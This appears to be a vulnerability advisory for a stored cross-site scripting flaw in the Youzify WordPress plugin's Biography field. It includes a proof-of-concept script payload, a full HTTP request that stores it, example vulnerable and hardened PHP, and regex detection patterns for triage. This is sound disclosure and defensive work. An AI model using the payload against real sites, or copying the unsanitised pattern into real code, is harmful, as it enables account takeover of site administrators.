WordPress Plugin Vulnerabilities
Youzify < 1.0.7 - Stored Cross-Site Scripting via Biography
Description
The About Me widget of the plugin does not properly sanitise its Biography field, allowing any authenticated user to store Cross-Site Scripting payloads in it, which are executed whenever the affected user's profile is viewed. This could allow a low-privilege user to gain unauthorised access to the admin side of the blog by targeting an admin: inducing them to view the attacker's profile with a malicious payload that, for example, adds a rogue account.
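The bug class described above, as an added example that is not Youzify's own code: a profile field saved as posted and printed as stored, beside a hardened save and render path built on the WordPress allowlist filter wp_kses_post(). The youzify_example_* function names and the in-memory $store array are assumptions for this example; only the POST field name youzify_options[youzify_wg_about_me_bio] comes from the proof of concept. Outside WordPress, wp_kses_post() is shimmed so the file runs with plain php.

```php
<?php
// Added example, not Youzify's code. It shows the pattern behind a stored XSS
// in a profile field: the value is saved as posted and printed as stored. The
// hardened version filters on save and again on output. Function names
// youzify_example_* and the in-memory $store array are assumptions; only the
// POST field name youzify_options[youzify_wg_about_me_bio] comes from the advisory.

// Stand-in so the file runs with plain `php` outside WordPress. Inside
// WordPress the real wp_kses_post() (an allowlist of tags and attributes) is
// already defined and this block is skipped; the stand-in is stricter and
// escapes all markup. double_encode=false keeps it idempotent, which matters
// because the hardened path filters twice.
if (!function_exists('wp_kses_post')) {
    function wp_kses_post($content) {
        return htmlspecialchars((string) $content, ENT_QUOTES | ENT_HTML5, 'UTF-8', false);
    }
}

// Vulnerable pattern: raw POST value in, raw stored value out.
function youzify_example_save_bio_vulnerable(array $post, array &$store): void {
    $store['bio'] = $post['youzify_options']['youzify_wg_about_me_bio'];
}
function youzify_example_render_bio_vulnerable(array $store): string {
    return '<div class="bio">' . $store['bio'] . '</div>';
}

// Hardened pattern. Filtering on save stops new payloads; filtering on output
// as well covers bios that were stored before the fix was applied, which a
// save-path fix alone would leave live.
function youzify_example_save_bio_hardened(array $post, array &$store): void {
    $raw = $post['youzify_options']['youzify_wg_about_me_bio'] ?? '';
    $store['bio'] = wp_kses_post((string) $raw);
}
function youzify_example_render_bio_hardened(array $store): string {
    return '<div class="bio">' . wp_kses_post($store['bio'] ?? '') . '</div>';
}

// Constructed request body mirroring the field name from the proof of concept.
$post = ['youzify_options' => ['youzify_wg_about_me_bio' => 'Hi <script>alert(/XSS/)</script>']];

$store = [];
youzify_example_save_bio_vulnerable($post, $store);
echo youzify_example_render_bio_vulnerable($store), "\n";

$store = [];
youzify_example_save_bio_hardened($post, $store);
echo youzify_example_render_bio_hardened($store), "\n";
```

Run with `php example.php`: the first line printed carries the script element through to the page, the second shows it neutralised. Note that the request in the proof of concept already carries a security field, so a nonce check does not by itself prevent this bug: the user is legitimately editing their own profile, and only sanitisation of the field on save and filtering or escaping on output address it.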
Proof of Concept
Log on as any user, go to the 'About me' widget section of your profile (https://example.com/members/<your username>/widgets/about_me/) and set the following payload in the Biography field:

<script>alert(/XSS/)</script>

Then view the profile (either as yourself or any other user) to trigger the XSS (https://example.com/members/<username>/).

POST /members/user1/widgets/about_me/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------330784649142342642204053017225
Content-Length: 1288
Connection: close
Cookie: [your user cookies]
Upgrade-Insecure-Requests: 1

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="upload_youzify_wg_about_me_photo"; filename=""
Content-Type: application/octet-stream

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_photo]"

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_title]"

User1
-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_desc]"

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_bio]"

XSS here <script>alert(/XSS/)</script>
-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="action"

youzify_profile_settings_save_data
-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="security"

318e0fbc53
-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="save"

-----------------------------330784649142342642204053017225--
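A triage check a site owner would want after reading the proof of concept, as an added example that is not Youzify's code: updating the plugin stops new payloads from being saved, but bios stored while the site was vulnerable remain in the database, so the function below flags user IDs whose stored bio contains active content that an allowlist sanitiser would never let through. The function name, the pattern list and the row shape are assumptions for this example; the advisory does not describe where the plugin stores the field. The patterns are a heuristic for review, not a sanitiser.

```php
<?php
// Added triage example, not Youzify's code. Finds users whose stored bio
// carries active content so they can be reviewed after the plugin is updated.
// The function name and the ['user_id' => int, 'bio' => string] row shape are
// assumptions for this example; the storage location is not in the advisory.

// Heuristic patterns for content an allowlist filter such as wp_kses_post
// would reject: script tags, inline event handlers, javascript: URLs and a
// few embedding elements. Expect occasional false positives and review by hand.
const YOUZIFY_EXAMPLE_ACTIVE_CONTENT = [
    '/<\s*script\b/i',
    '/\bon[a-z]+\s*=/i',
    '/javascript\s*:/i',
    '/<\s*(iframe|object|embed|svg)\b/i',
];

// Return the user IDs whose bio matches at least one pattern, in input order.
function youzify_example_find_suspicious_bios(array $rows): array {
    $flagged = [];
    foreach ($rows as $row) {
        foreach (YOUZIFY_EXAMPLE_ACTIVE_CONTENT as $pattern) {
            if (preg_match($pattern, (string) $row['bio'])) {
                $flagged[] = (int) $row['user_id'];
                break; // one hit is enough to flag this user
            }
        }
    }
    return $flagged;
}

// Constructed sample rows standing in for an export of the stored bios.
$sample = [
    ['user_id' => 1,  'bio' => 'Site admin. <strong>Hello!</strong>'],
    ['user_id' => 7,  'bio' => 'XSS here <script>alert(/XSS/)</script>'],
    ['user_id' => 9,  'bio' => '<a href="javascript:alert(1)">my site</a>'],
    ['user_id' => 12, 'bio' => 'Just a normal bio with an & ampersand.'],
];

// Prints the flagged IDs (7 and 9 for the sample above); a real run would
// feed rows pulled from the site's database into the same function.
print_r(youzify_example_find_suspicious_bios($sample));
```

Flagged accounts should have the bio re-saved through the updated plugin (so the fixed sanitisation runs over it) or cleared, and the account's activity reviewed, since the description above notes the payload can be used to add a rogue administrator.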
Classification
Type: XSS

Miscellaneous
Original Researcher: Phu Tran from techlabcorp.com
Submitter: Phu Tran
Verified: Yes

Timeline
Publicly Published: 2021-06-28
Added: 2021-06-28
Last Updated: 2022-01-02